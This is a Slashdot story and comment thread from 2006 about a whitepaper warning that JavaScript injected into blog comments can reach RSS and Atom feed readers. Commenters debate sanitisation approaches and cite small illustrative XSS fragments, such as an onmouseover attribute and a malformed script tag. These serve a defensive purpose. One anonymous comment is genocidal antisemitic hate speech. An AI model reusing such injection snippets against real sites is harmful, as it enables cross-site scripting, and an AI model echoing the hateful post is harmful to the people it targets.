Beta

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

RSS and Web Feeds a Risk?

ScuttleMonkey posted more than 7 years ago | from the risk-around-every-cyber-corner dept.

94

A followup whitepaper [PDF] to a recent talk at the blackhat security conference has been released outlining the risks associated with web based feeds such as RSS and Atom. From the article: "Attackers could exploit the problem by setting up a malicious blog and enticing a user to subscribe to the RSS feed. More likely, however, they would add malicious JavaScript to the comments on a trusted blog, Auger said. "A lot of blogs will take user comments and stick them into their own RSS feeds," he said."

cancel ×

94 comments

Sorry! There are no comments related to the filter you selected.

Huh? (5, Insightful)

Umbral Blot (737704) | more than 7 years ago | (#15856803)

Seems more like a problem with allowing javascript in comments (a really dumb idea) than a problem with RSS.

Re:Huh? (1, Insightful)

Anonymous Coward | more than 7 years ago | (#15856820)

Thread over. :)

Re:Huh? (2, Insightful)

Richy_T (111409) | more than 7 years ago | (#15858735)

An RSS feed does not include HTML. The issue is therefore that any reader that interprets the feed directly should not process any HTML tags (and hence not interpret Javascript) and any agregator that takes a feed and inserts it into an HTML page should escape all HTML special characters.

That is not to say that the feed can not contain HTML characters, a deiscription "Microsoft says the <a> tag to be depreciated in Vista" is fully valid but should be treated as plain text, *not* html.

Sites which take formatting from their headlines and/or descriptions and include them in the RSS feed *are* broken but the real security bug lies where the text within is not treated as plain text by whatever reads the feed.

Rich

Re:Huh? (1)

Richy_T (111409) | more than 7 years ago | (#15859336)

Actually, I spoke to soon since < and > are valid XML characters. It's been a while since I worked with XML closely so I'm not sure what the correct way to handle them are. Most of the point still stands though, the fields should be treated as XML encoded plain text.

Rich

Re:Huh? (2, Insightful)

StormReaver (59959) | more than 7 years ago | (#15856868)

"Seems more like a problem with allowing javascript...."

You could have stopped here, and have been even more correct.

Re:Huh? (1)

ThePhilips (752041) | more than 7 years ago | (#15858223)

+10. Seems like time have come to implement subset of X/HTML w/o any bells and whistles - object/scrip included. As wide as X/HTML is used now that could become serious problem sooner than later. (E.g. many Mozilla problems fall into that category: JavaScript is run were it wasn't expected to be run.) Just like ActiveX now widely used by by spy/mal/ware: all what the little worms need to do is to tell IE to render some particular web page, in few easy steps ActiveX is launched and your PC is - voila! - already infected. JavaScript isn't powerful enough to create as much problems as ActiveX is capable of, but I do think that it is UNwise to allow plain message with pictures/links - what most of programmers want of HTML renderer - to do anything more than render plain message with pictures/links.

Re:Huh? (1)

biffta (961416) | more than 7 years ago | (#15858416)

I think we should all calm down a bit. JavaScript can make web pages more fun. We should start giving the users more trust and let the emphasis be on them not to put bad ActiveX and JS in their submissions. Who's with me???

Re:Huh? (3, Informative)

AVryhof (142320) | more than 7 years ago | (#15857157)

strip_tags SHOULD work ... then you have readers and web browsers that use the IE rendering engine that executes JavaScript whether it's in a script tag or not.

Quite annoying if you ask me. It shouldn't be executed if the script tag or javascript: doesn't exist.

That's why I always use a form of bbcode instead of html for comment forms.

Re:Huh? (1)

piranha(jpl) (229201) | more than 7 years ago | (#15857652)

PHP is limiting the way you consider solving the problem. Just because strip_tags() doesn't do the trick for MSIE doesn't mean there's no reliable way. This is the function PHP needs to bundle in its standard library. [slashdot.org]

Re:Huh? (1)

Crayon Kid (700279) | more than 7 years ago | (#15858340)

What you're describing is basically a blacklist of all the ways that JavaScript could make its way into HTML. Blacklisting is a very poor security method, because it makes you chase your tail indefinitely, including more and more badware into your list with no end in sight. It didn't work for antiviruses and antispyware and it's not going to work here, although there are people crazy enough to try. If anything, this is treating the symptoms, not what the GP proposed.

Furthermore, your approach relies on a pretty wild presumption: that the source is properly structured HTML. If HTML was properly structured they wouldn't have had to invent XHTML instead. Plus, today's browsers will try to interpret both XHTML and HTML even if they're not structured properly, so invalid [X]HTML still becomes a JavaScript carrier and your blacklist enterprise is doomed to a neverending journey of catching all the possible ways of abusing this markup. Good luck with that.

For what it's worth, there is already a very good implementation of this idea, called Kses [sourceforge.net] . It's a very thorough filtering library, it's being used internally by WordPress, and still hasn't stopped recent versions of WordPress 2.x from suffering from this kind of security vulnerability.

By contrast, consider the whitelist approach proposed by strip_tags + BBcode. You use strip_tags and thus you wipe clean every trace of JS exploit attempt. Then you interpret BBcode in a controlled manner, a markup which has no way of being interpreted in "creative" ways should it escape as is into a browser. And you're done.

That is what I call secure and simple. Simple is good, because it's not complex. The more complex the solution, the more chance for mistakes which allow for security holes.

Re:Huh? (1)

TheShadowzero (884085) | more than 7 years ago | (#15858870)

Simple is good, because it's not complex.
Occam's razor. Good point.

Re:Huh? (1)

Fweeky (41046) | more than 7 years ago | (#15860440)

"If HTML was properly structured they wouldn't have had to invent XHTML instead"

That sounds pretty fallacious. Try again?

"For what it's worth, there is already a very good implementation of this idea, called Kses. It's a very thorough filtering library, it's being used internally by WordPress, and still hasn't stopped recent versions of WordPress 2.x from suffering from this kind of security vulnerability."

What was it that the post the parent linked to said? Ah yes: "The cause is not thinking of and treating your HTML input as structured data. Rather, you're thinking of it as a character stream. Textual substitutions are a sign of that line of thought." Guess what Kses does?

"Then you interpret BBcode in a controlled manner"

How is that any better than interpreting (pseudo)HTML in a controlled manner? Especially when the vast majority of BBcode style engines are simply hideous regexp replacement hacks. At the end of the day you want to parse the document into an intermediate form which is nothing but plaintext and data structures identifying the elements, attributes and values you support, which you then serialize into whatever output format you need. Anything else is inviting creative ways to bypass or otherwise break your ad-hoc text replacements.

Re:Huh? (1)

piranha(jpl) (229201) | more than 7 years ago | (#15863730)

What you're describing is basically a blacklist of all the ways that JavaScript could make its way into HTML.

You don't seem to understand what I proposed. I'm describing building a whitelist of allowable HTML elements in a document. And advising you to make informed decisions on whether to support certain elements and attributes, erring on the side of not supporting them for the sake of security.

As an example, many know that Javascript can be included, legally, in CSS. Let's say we're implementing the system I described in a pre-CSS-dominance world. We aren't familiar with the <style> element (even though it is defined in HTML), so we decide not to worry about formally parsing CSS—we simply discard <style> elements. We can choose to throw away the <style> element entirely, or include its content in place of the element. The result, 3 years and zero software releases later: someone tries a Javascript-URI-in-CSS exploit and falls on their face because without <style>, the browser doesn't interpret the intended CSS stylesheet as CSS.

Furthermore, your approach relies on a pretty wild presumption: that the source is properly structured HTML.

The BBcode approach relies on a pretty wild presumption: that the source is properly structured BBcode. (Remark: HTML and BBcode are both markup languages. Exercise: which has the most variety of lenient parsers? Which has been proven? Which is formally defined?)

Today's browsers will try to interpret both XHTML and HTML even if they're not structured properly, so invalid [X]HTML still becomes a JavaScript carrier and your blacklist enterprise is doomed to a neverending journey of catching all the possible ways of abusing this markup. Good luck with that.

You really missed the point. It doesn't matter if the system I described uses a lax parser or a strict parser. Because the parser generates a data structure, and because it is the data structure which is manipulated, and because the output of the system is always well-formed HTML or XHTML from an HTML or XML serializer, there's no risk of Internet Explorer misinterpreting any not-well-formed data. Such data is sanitized by virtue of the design of the system. As an example, consider an HTML fragment: <script\x00 type="...">...</script> (I don't know if this is a real MSIE vulnerability, but it is close to one.) This system will either:

  • Pretend it didn't see the bogus <script\x00> open-tag, and skip the non-matching </script> close-tag. No danger.
  • Interpret it as an actual <script> element, which will be filtered by the higher-level logic. No danger.
  • Interpret it as the literal text "<script\x00>", which will correctly be reserialized upon output to &lt;strong&#0;&gt;. No danger.
[kses] is a very thorough filtering library, it's being used internally by WordPress, and still hasn't stopped recent versions of WordPress 2.x from suffering from this kind of security vulnerability.

Can you provide a reference? I couldn't find any information about this vulnerability [google.com] .

By contrast, consider the whitelist approach proposed by strip_tags + BBcode. You use strip_tags and thus you wipe clean every trace of JS exploit attempt. Then you interpret BBcode in a controlled manner, a markup which has no way of being interpreted in "creative" ways should it escape as is into a browser.

To implement that in a way that results in well-formed HTML or XHTML, you would have to parse the BBcode and serialize the resulting data structure as HTML or XML. Which is nearly as much work as my method, but with the major loss of inventing a superfluous markup language. Again, HTML wins for ubiquity.

I think I've addressed all your objections. Considering I've produced hypothetical attacks foiled by my method, I would welcome test-cases to disprove it.

Re:Huh? (3, Interesting)

Sepodati (746220) | more than 7 years ago | (#15857724)

strip_tags() is one of the most worthless functions PHP offers. First, it gets rid of evil, nasty, harmfull code such as or . Why do you have to jack up the text that the user wrote when there's no need? There are much better functions or methods to escape and not parse JavaScript or HTML, such as htmlentities() or htmlspecialchars() for two.

The second issue is with the "allowed tags" attribute of strip_tags. You may think to yourself that allowing , , tags, etc. is pretty harmless. Except that there's still no checking on the attributes of those tags. I can include a mouse over me! and strip_tags will happily allow that through and you think you're safe by only allowing a couple of harmless tags.

This whole article is just another example of blaming the technology instead of the shitty programmers who implement it.

---John Holmes...

Re:Huh? (1)

baadger (764884) | more than 7 years ago | (#15857937)

... someone needs to learn about &lt; and &gt;

Re:Huh? (1)

Sepodati (746220) | more than 7 years ago | (#15857977)

see my other reply... "plain old text" means something different to me than it does to slashcode, I guess...

Re:Huh? (2, Interesting)

Sepodati (746220) | more than 7 years ago | (#15857778)

strip_tags() is one of the most worthless functions PHP offers. First, it gets rid of evil, nasty, harmfull code such as <grin> or <anything f'n thing>. Why do you have to jack up the text that the user wrote when there's no need? There are much better functions or methods to escape and not parse JavaScript or HTML, such as htmlentities() or htmlspecialchars() for two.

The second issue is with the "allowed tags" attribute of strip_tags. You may think to yourself that allowing <b>, <i>, <strong> tags, etc. is pretty harmless. Except that there's still no checking on the attributes of those tags. I can include a <b onmouseover="whatever_javascript();">mouse over me!</b> and strip_tags will happily allow that through and you think you're safe by only allowing a couple of harmless tags.

This whole article is just another example of blaming the technology instead of the shitty programmers who implement it.

---John Holmes...

Re:Huh? (1)

Crayon Kid (700279) | more than 7 years ago | (#15858388)

strip_tags() is just a shortcut. You can obtain the same effect with a regular expression. Since you're talking about "bad programmers", how about not blaming PHP creators but instead blame whoever relies on strip_tags blindly. The limitations of this functions are pretty clearly explained in the manual. If someone uses it thinking it will end JavaScript injection, it's their own fault for assuming that.

Re:Huh? (3, Interesting)

sporkmonger (922923) | more than 7 years ago | (#15857459)

Eh, comments are just the most likely vector of attack. The real problem is with any feed parser that naively trusts the HTML. Parsers should be as secure as browsers, and for the most part, they aren't, because most of them are written by someone who not only hasn't read the specs but also was only planning to write the thing in 3 hours. (Heh, I've been working on my parser for over a year now.) That said, the risk of this becoming a real problem is rediculously low. Beyond that, this has been a known issue for ages. Several years ago, Mark Pilgrim used his feed and an insecurity in IE to force his readers to look at lots of platypuses, mainly to prove the point that it could be done. However, both my parser and Mark's, which are used in a fairly significant number of different programs, completely strip out all elements that aren't guaranteed to be safe. Plus, most of the feed readers that were actually mentioned as being vulnerable to certain attacks have been reasonably quick to correct issues that are raised. The whole thing really just isn't worth sweating about, but it's certainly nice to have awareness of the issue raised among people who didn't know it was a problem.

The question is... (1)

Gunfighter (1944) | more than 7 years ago | (#15857477)

... how many RSS readers are actually going to heed the advice and include a function to strip the tag (or any other tags that could potentially be harmful) and enable it by default? Given the number of RSS readers out there (both web and desktop based), I don't see this happening en masse anytime soon. Pity though... obviously it's a risk that can be avoided.

Re:The question is... (1)

sporkmonger (922923) | more than 7 years ago | (#15858784)

The feed reader I use does, as does the feed parser that I wrote. It's common practice actually. This whitepaper merely identified all the stupid programmers.

Hardly something new... (1)

DrYak (748999) | more than 7 years ago | (#15858004)

One should copy-paste comment blocks from RSS directly into a webpage, without either validating content or striping tags. Otherwise, at least it's highly likely that the page style will get broken.

That's hardly news.

Re:Huh? (1)

nxt (679989) | more than 7 years ago | (#15859068)

I'd say it's a problem of Feedreaders instead of RSS itself. You could write the say for email: some can send a HTML email with script tag inside. Problem is the execution of this script in clients environment. If a restaurant pours gasoline into someones bottle of a cola - it's hardly a cola problem....

Old technique, new medium (5, Insightful)

fosterNutrition (953798) | more than 7 years ago | (#15856810)

Not to be the jerk here, but it really shouldn't be that big of a news story that some people discussed the idea that it might not be the best security practice to allow unvalidated user input.

Nobody would think of performing no kind of checking on things submitted into a plain old text box, so why would it be safe just because it's now in the "synergetic web 2.0 blogosphere of community-driven empowerment through technology"

Oh well, still a moderately interesting article...

Re:Old technique, new medium (4, Informative)

Bogtha (906264) | more than 7 years ago | (#15856930)

Not to be the jerk here, but it really shouldn't be that big of a news story that some people discussed the idea that it might not be the best security practice to allow unvalidated user input.

Exactly. This is a minor variation on the same old mistakes web developers usually make. It's just that a lot of developers seem to have forgotten that Atom and RSS feeds need to be sanitised just as much as any other untrusted input.

This is by no means a new concept; off the top of my head, I remember Mark Pilgrim [diveintomark.org] talking about this three years ago, and I remember thinking how damn obvious it was back then and being surprised that it was news to people.

I think one of the contributing factors is that a lot of borderline incompetent developers have learned to sanitise form input not because they understand the problem, but because they've simply had it hammered into their heads that they need to sanitise stuff that comes in through forms. Given a different form of input with exactly the same problem, they don't recognise that they need to sanitise it because it's not coming in through a form. They haven't learned why the problem exists, they've just memorised "form data == sanitise".

Re:Old technique, new medium (4, Interesting)

darkewolf (24563) | more than 7 years ago | (#15856983)

Funnily enough, part of an extension to a project the company I am at is working on, is for users to be able to import their external blog feeds into the blog on the site. Basically so they don't need to type the same blog information in two different places. Easy to do. And even before looking at the output of some places like BlogSpot, it was mandated to sanitize the output to using just basic HTML (P, BR, stripped down IMG, stripped down A) and nothing else. Yes, they will lose some formatting that places like blogspot allows, but so much saner.

So in the real world, a lot of sensible developers understand the problem with risky external input, although lots of baby-developers haven't had enough experience to get jaded and never trust users. Security thoughts come from age and being cynical.

But either way, the Web2.0 look irks me :P

Old technique, new medium-It's a stretch. (-1)

Anonymous Coward | more than 7 years ago | (#15857275)

"Security thoughts come from age and being cynical."

Then everyone here must be locked up tighter than goatse.cx's A-hole then.

Re:Old technique, new medium (1)

quis (737516) | more than 7 years ago | (#15857991)

Lilina [sourceforge.net] might well be what you're looking for to aggregate those blogs...

So.. (5, Insightful)

Tracer_Bullet82 (766262) | more than 7 years ago | (#15856819)

If I trust someone and let them have free access to my house, there's a chance one day they'll swipe every thing from it and load into a truck..

just because something is some kind of "new" technology does not mean any different..

use common sense and intelligence.

So..Carry and cash. (1, Funny)

Anonymous Coward | more than 7 years ago | (#15856919)

"If I trust someone and let them have free access to my house, there's a chance one day they'll swipe every thing from it and load into a truck.."

Excuse me, Tracer. You can keep the underwear.

Re:So.. (5, Funny)

truthsearch (249536) | more than 7 years ago | (#15856979)

That's a bad analogy. The internet's more like a series of tubes than a truck... oh, um, forget it.

Re:So.. (1)

thealsir (927362) | more than 7 years ago | (#15857058)

One of the basic security concepts: Don't trust the user. Don't ever trust the user. Assume the user is a cracker wanting to cause harm. Then you remember to htmlchar all javascript attempts so the browser can't interpret them.

Re:So.. (2, Insightful)

Zelbinian (992687) | more than 7 years ago | (#15857131)

Someone wiser than I once said "Common sense is not that common."

RSS Feed: Jews are the enemy! (-1, Flamebait)

Anonymous Coward | more than 7 years ago | (#15856837)

If all the jews had been gassed by the Germans like they should have been, we would have far fewer wars today. Time and time again, the jew proves himself to be a bloodthirsty demon. Why do whe still allow him to exist?

GAS THE JEWS. THE RACE OF MURDERERS AND THEIVES SHOULD BE EXTERMINATED!!1!

Re:RSS Feed: Jews are the enemy! (4, Funny)

Anonymous Coward | more than 7 years ago | (#15857147)

You were awesome in Braveheart.

Re:RSS Feed: Jews are the enemy! (1)

JesperJ (900341) | more than 7 years ago | (#15858030)

I understand why you chose to post anonymous not to mention "Off Topic". :p

Bloglines (3, Informative)

TheOtherChimeraTwin (697085) | more than 7 years ago | (#15856846)

It turns out that Bloglines [bloglines.com] was notified in advance by SPI Dynamics about the problem, and took steps to fix the problem the same day. Nicely done by both parties!

Security (0)

Anonymous Coward | more than 7 years ago | (#15856855)

Wouldn't RSS over XMPP be better.

Heh (5, Funny)

Andrew Kismet (955764) | more than 7 years ago | (#15856869)

Isn't it amusing I found this article by using /.'s own RSS fee!"$%&() ****NO CARRIER****

Re:Heh (1)

MobileTatsu-NJG (946591) | more than 7 years ago | (#15856901)

"Isn't it amusing I found this article by using /.'s own RSS fee!"$%&() ****NO CARRIER****"

Yeah, Slashdot's RSS feature banned me a few times, too.

Re:Heh (1, Funny)

mrkitty (584915) | more than 7 years ago | (#15856963)

Yes you're so owned.

Re:Heh (1)

Tankko (911999) | more than 7 years ago | (#15856997)

>>Isn't it amusing I found this article by using /.'s own RSS fee!"$%&() ****NO CARRIER****

Why are you still using dial-up?

What sensible feed aggregator allows javascript? (2, Insightful)

jZnat (793348) | more than 7 years ago | (#15856898)

That's like allowing javascript in HTML email. Any sensible aggregator (and mail cient) disables all javascript by default.

Someone please reassure me that Vista's aggregator does so as well. In fact, can anyone even refer to an aggregator that parses and enables javascript? I can't begin to think of where to find one.

Re:What sensible feed aggregator allows javascript (2, Insightful)

nwbvt (768631) | more than 7 years ago | (#15856973)

From the article:

SPI Dynamics examined a number of online and offline applications used to read RSS and Atom feeds. In many cases any JavaScript code delivered on the feed would run on the user's PC, meaning it could be vulnerable to attack, Auger said.

They don't name names, but it does seem like a number of aggregators do support JavaScript. And when the day comes where someone develops a "Web 2.0 AJAX enabled blog", there will be pressure for more and more aggregators to support JavaScript (likely it will be an option that can be disabled, but who is going to do that if it means they cannot access certain features on certain blogs).

This is just one more reason I hate Javascript.

Re:What sensible feed aggregator allows javascript (1)

jZnat (793348) | more than 7 years ago | (#15857043)

The point of feeds is to get just the content without all the crap (including ads and CSS). If more people would make their feeds right, this wouldn't really be a problem. There's no point in using more than links via the "a" element, images via the "img" element in a feed, separating paragraphs via the "p" element, and the occasional semantic elements like "strong", "em", "ins", and "del".

Re:What sensible feed aggregator allows javascript (1)

Fred_A (10934) | more than 7 years ago | (#15858222)

Indeed there is no point, but if the client software supports it then adding programatically rich content is a risk that can be exploited. Even if sensible feed programs strip risky content, someone can easily code a feed that feeds dangerous data or a popular site can be compromised.

Bottom line is RSS readers must be as tight as tight web browsers (that is preferably not based on IE).

Re:What sensible feed aggregator allows javascript (1)

jZnat (793348) | more than 7 years ago | (#15859266)

An aggregator that parses HTML with mshtml.dll would be the worst security hole imaginable. libkhtml.so or libmozjs.so/dll (? I don't remember if that contains all of Gecko) might be an improvement, but parsing HTML in a feed (other than the markup I mentioned) is stupid anyhow.

Re:What sensible feed aggregator allows javascript (0)

Anonymous Coward | more than 7 years ago | (#15858199)

That's like allowing javascript in HTML email.

It's like allowing Javascript period. Web sites you intend to visit can be just as malicious as email, RSS feeds, user input, or Web sites you don't intend to visit. You shouldn't be automatically executing code you get off the Net at all. Javascript was a bad idea from the start. Why do we still tolerate it?

They saw it coming! (3, Insightful)

bruno.fatia (989391) | more than 7 years ago | (#15856899)

If I can remote execute code, I can remote execute malicious code. Nothing new please move along

What about Microsoft? (1)

1sockchuck (826398) | more than 7 years ago | (#15856902)

The big issue on RSS security is Microsoft's integration of RSS into Vista. Given hackers' success targeting e-mail and browsers weaknesses, will Microsoft's implementation of RSS be better? Let's hope so. Netcraft wrote about this more than a year ago [netcraft.com] , but there's been very little discussion since. It's trivial to spoof and augment a feed. Rather than trying to target weaknesses in individual RSS readers, there's a single Microsoft implementation to test and attack. It's a game changer in terms of RSS' potential usefulness as a malware delivery channel.

Re:What about Microsoft? (1)

liangzai (837960) | more than 7 years ago | (#15857278)

No, this is not a Microsoft problem. RSS is already integrated since long in Safari, and whatever Safari can do, RSS can also do, and should be able to do. It is a general security problem that is part of the browser security aspect.

Since most people (me excluded) use pre-fabbed blog tools like Wordpress or online blog services, most feeds should already be sanitized.

Microsoft just have to make browser and email security a top issue in Vista, and disable most services (especially automatic execution) by default.

don't trust input (1)

Kevinv (21462) | more than 7 years ago | (#15856904)

forms (comment or otherwise) shouldn't trust input from users, javascript & html should be filtered out.

RSS feeds shouldn't trust input from other systems, javascript & html should be filtered out.

or to simplify, no program should trust input of any type (user input, data from files, data from databases) validate and filter it before using it. If it isn't a cross-script problem it's a buffer overflow problem.

The slides can be found here (3, Informative)

Anonymous Coward | more than 7 years ago | (#15856906)


RSS Security Slides [cgisecurity.com]

#4 on the Threatdown - Refrigerators (1)

richdun (672214) | more than 7 years ago | (#15856917)

Isn't everything that allows for a not easily listed number of possible inputs/outputs (like a blog, as opposed to a "yes/no" question) possibly a security risk if you don't clamp down on what is done with those inputs/outputs? I like that people are discussing this sort of thing and hopefully encouraging other to prevent this, but once again the /. title makes it sound like all RSS feeds are a risk - when really, just the unsecured, unvalidated ones are.

Validation is the only problem (3, Insightful)

DivineOmega (975982) | more than 7 years ago | (#15856944)

The technology behind web feeds such as RSS and Atom (if you can call an XML file a 'technology') is perfectly safe, it is merely the content of the feed itself which can cause problems.

No one can stop a malicious user from setting up their own feed containing dangerous feeds. However, for existing blogs and weblogs, the validation methods to prevent the input of code and script into comment fields has been around and known about for several years.

Re:Validation is the only problem (1)

rapidweather (567364) | more than 7 years ago | (#15856971)

I've placed RSS feeds in Opera 9.01 (Build 400) and in Mozilla Firefox 1.5.0.6 in my knoppix remaster. [geocities.com] Since this is a livecd linux, I wonder how these feeds, enabled by default to download the feed stories when the browsers start up, might be a security risk.
I'm only using feeds like FoxNews, Google News, Yahoo News, CNN News, and of course, Slashdot. There are 13 in Opera, and 9 in Firefox.
The user can quickly set up additional feeds, I am sure. These may link to sites that are not trusted, I suppose.

Here's my Blog. [blogspot.com]
I have more details there on RSS for the browsers in a livecd linux.

-- Rapidweather

Am I alone? (-1, Troll)

Anonymous Coward | more than 7 years ago | (#15856960)

or is everyone else sick of these self-important blogging fags too?

summary: (0)

Anonymous Coward | more than 7 years ago | (#15856998)

blah blah feeds can contain HTML and JS OMG blah blah it's moronic to allow arbitrary html/js in comments blah blah IE might have an exploitable JS engine blah blah.

In short, RSS feeds from broken sites are as much a problem as the broken sites themselves.

Also, in what sense is "JavaScript is a scripting language that experts say is increasingly causing security concerns."? It's been around for 11 years, and it seems to be far less of an issue than Yet Another 0-day Remote Exploit In MS Software or even IE/FF flaws.

Can't be that high risk. (1)

kbox (980541) | more than 7 years ago | (#15857009)

It can't be that much of a risk. I haven't heard of a single instance of this happening in the entire time that RSS has been available...

Simple rule for input (4, Insightful)

fractalVisionz (989785) | more than 7 years ago | (#15857011)

Never let input go unchecked. If you do, you are already screwed.

You're missing the point - it's about the "reader" (3, Insightful)

hutchike (837402) | more than 7 years ago | (#15857050)

It doesn't matter whether we're looking at published blog entries or comments, anything that is fed via RSS or Atom can move JavaScript (for good or bad) - and what the article makes clear is that the problem lies in the news reader programs themselves. They simply don't apply the same level of security you might expect from Mozilla (Firefox), Safari, Opera, Internet Explorer, etc...

The bottom line here is that RSS/Atom reader programs need to apply similar security checks to those performed by popular secure web browsers.

RTFA ;-)

Oh God (4, Insightful)

The MAZZTer (911996) | more than 7 years ago | (#15857068)

I can write virii in C++! It's a C++ vulnerability!

Seriously, this is dumb. It is not a problem with RSS/Atom, it is a problem with RSS/Atom viewers that allow JavaScript code to be executed!

Within the context of a web-based viewer this could be a problem, but then again it's no more of a problem than if you go to a questionable site with bad JavaScript. For a browser-based viewer it's simply a matter of the devs remembering to turn off JavaScript support for RSS/Atom feeds.

And in desktop-based viewers... I mean really, who would be stupid enough to even consider implementing JavaScript in one. And if it only does because the programmer took the lazy route and is using a WebControl in the background, well they might want to consider a different method that will actually give them some measure of CONTROL.

Speaking of poorly coded, I wonder if we'll see IE exploits arising from embedded ActiveX controls in RSS feeds, those would cause far more damage than while (1) { window.print(); window.alert("LOL INTERNET"); }.

Re:Oh God (1, Offtopic)

Habbie (601521) | more than 7 years ago | (#15857117)

Dude, they're called VIRUSES. Saying 'virii' makes you look like a total fool.

Re:Oh God (0)

Anonymous Coward | more than 7 years ago | (#15857130)

Who cares what he wants to call them?

Except that it CAN be virii (1)

The MAZZTer (911996) | more than 7 years ago | (#15857171)

Re:Except that it CAN be virii (2, Insightful)

xenoandroid (696729) | more than 7 years ago | (#15857220)

"No reputable printed dictionary includes them as correct forms. "

VIRII is NOT a word.

Re:Except that it CAN be virii (1, Insightful)

Anonymous Coward | more than 7 years ago | (#15857234)

You do realise that Wikipedia isn't an authorative source, don't you? And even if you trust Wikipedia as a source, if you read further [wikipedia.org] :

In the English language, the standard plural of virus is viruses. This is the most frequently occurring form of the plural, and refers to both a biological virus and a computer virus.

The less frequent variations viri and virii are virtually unknown in edited prose, and no major dictionary recognizes them as alternative forms.

Re:Oh God (0)

Anonymous Coward | more than 7 years ago | (#15859249)

For goodness sake. Next you'll be trying to persued us that boxen isn't a valid plural of box when used refer to computer hardware.

Re:Oh God (1)

piranha(jpl) (229201) | more than 7 years ago | (#15857575)

Feed formats are a vector for vulnerability. The proper analogy isn't "C++ is evil," it is "throwing feeds on your site without sanitization is as bright as running arbitrary executables from the Internet."

Pulling the Javascript, plugin, and ActiveX junk out of arbitrary XML data is much less trivial than "remembering to turn off JavaScript support." There is no such check box. This is apparently hard to get right, judging by the rash of XSS bugs. There needs to be the equivalent of such a check box in any library that is tempting to use for Web development.

On "LOL INTERNET": I hope you were being facetious. XSS is much more dangerous than that.

Bogus (4, Funny)

Nijika (525558) | more than 7 years ago | (#15857272)

NEWSFLASH: Hackers MAY set up websites and services to lure victims! Film at 11.

Re:Bogus (1)

Finneh (992335) | more than 7 years ago | (#15857462)

NEWSFLASH: If you are stupid enough to fall for a website and service like that than you shouldn't even be running an RSS feed to begin with!

Just encode it, that's what I do (2, Insightful)

chudik (746965) | more than 7 years ago | (#15857274)

This is the case where I subscribe to the school of thought that the RSS description element should have no markup. The original purpose of RSS was not to distribute whole articles but only describe them and provide a link.

Re:Just encode it, that's what I do (1)

Richy_T (111409) | more than 7 years ago | (#15858679)

Here's the issue though... Say the field is supposed to have no markup. "<" and ">" are now valid characters. That means is is now the browser's fault if it interprets the tags as valid HTML (and thus capable of containing Javascript).

I don't know how to read XML document templates well enough. Can anyone confirm or deny if the elements are supposed to be able to contain HTML markup or whether they should be treated as plain text?

Rich

Re:Just encode it, that's what I do (1)

chudik (746965) | more than 7 years ago | (#15858748)

That's why it should be encoded even if it's not supposed to have markup. I encode the title and anything else that gets displayed directly from the input.

Re:Just encode it, that's what I do (1)

Richy_T (111409) | more than 7 years ago | (#15859378)

It depends where you encode it. I've seen where people HTML escape input before putting it into a database which has cause problems later. Input should be validated and stored raw in a database (passed suitably escaped for database input of course) HTMLencoding should be reserved for the output since you don't necessarily know that HTML is what you will need to output.

Then again, there are situations where you may want to output HTML that has been input. That is easier to decide on the output side of things than the input.

Of course, that may be what you are doing. It's not clear from what you wrote.

Rich

Re:Just encode it, that's what I do (1)

chudik (746965) | more than 7 years ago | (#15859451)

Agreed.

However, in my case it's not applicable. Maybe I should have clarified from the start that I'm working on an RSS Reader (a SharePoint web part derived from this one [asp.net] ). So my content comes from feeds, not a database.

Color me stupid... (4, Interesting)

Zaphod2016 (971897) | more than 7 years ago | (#15857311)

...but why would anyone *want* to include JavaScript in an RSS feed? Other than showing ads or annoying viewers, what possible purpose would it serve?

And, as someone above suggested, what the hell is a "Web 2.0" RSS feed? Even if I used AJAX to make a nice-n-pretty UI for my blog, that still wouldn't explain why I would use JavaScript for my RSS feed.

Re:Color me stupid... (1)

bytesex (112972) | more than 7 years ago | (#15858307)

Uhm. I think you can figure out what a 'web 2.0' rss feed is. I too, hate the term, but I presume that what we have here is a situation wherein a xmlhttprequest is forged, sent to the server, to beget a bitty of text from the rss producing server. All live and pronto onto your page, without intervention from the server that produced you. As opposed to a page which contains the information from the feed static, as produced by the webserver. Nothing exotic these days. Who would. Why - someone malicious, of course !

Re:Color me stupid... (1)

Zaphod2016 (971897) | more than 7 years ago | (#15858376)

Say I wanted to create a simple program to check /.'s RSS feeds every 15 minutes. I might design something web-based, using XmlHttpRequest. However, this function is part of my aggregator- I still see no valid reason to include this script within the XML document itself.

Isn't the whole point of XML to provide the raw content in a simple format? Seems to me "less is more".

Unless... (1)

Zaphod2016 (971897) | more than 7 years ago | (#15858402)

A thought just occured to me- if I was running a site dealing with, say, Google Maps, I might have reason to include JavaScripts, but only if I wanted to "broadcast" the maps via XML. But would this feed work with FeedGator, Netvibes, etc, etc? In other words, even if I was to setup my XML in this manner, would any of my readers be able to benefit from it?

Instinct says no.

In Case You Wanted RSS Comments ... (2, Informative)

thetan (725014) | more than 7 years ago | (#15857584)

"A lot of blogs will take user comments and stick them into their own RSS feeds," he said.

Blogger [blogger.com] doesn't (directly) support comment feeds. If you're interested in setting this up on your Blogspot blog (so you can, for example, get truly recent comments [editthis.info] ), check out this bloghacking wiki [editthis.info] .

I can't vouch for the security of these methods, though.

-Thetan.

Re:In Case You Wanted RSS Comments ... (1)

giafly (926567) | more than 7 years ago | (#15858029)

A lot of user's comments should be stuck in their own RSS feeds.

I blog with malice! (1)

identity0 (77976) | more than 7 years ago | (#15857696)

This paper was so worth it, if only for inventing the term "Malicious blog". I can only imagine an army of teenage girls cracking their ex-boyfriend's computer by embedding exploits into their melodramatic poetry.

Mood: h4xx0r

elmer FUD (1)

Doomedsnowball (921841) | more than 7 years ago | (#15857825)

It's wabbit season! Oh my god! Everything of value is vulnerable! Air and water are a threat! Did you hear? Speach, human voice, could contain mistruths and even outright lies! If you take candy from a stranger, you could end up molested and dead! No S**t Sherlock. I'm sorry, but did somebody release some technology in the last 30 years that wasn't vulnerable to malicious use? And to say that people have to take idiotic steps to make themselves vulnerable is kinda a red flag, don't you think? Javascript doesn't steal your personal information, hackers steal your personal information. Hmmm... that sounds sorta familiar... where's my bulletproof firewall?

RSStool (0)

Anonymous Coward | more than 7 years ago | (#15858015)

RSStool will filter such crap with the next release. http://rsstool.berlios.de/ [berlios.de]

Podcast files could contain virusses (1)

giafly (926567) | more than 7 years ago | (#15858021)

World to end unless you buy stuff from the authors [spidynamics.com]

Just predicting next week's USA Today exclusive.
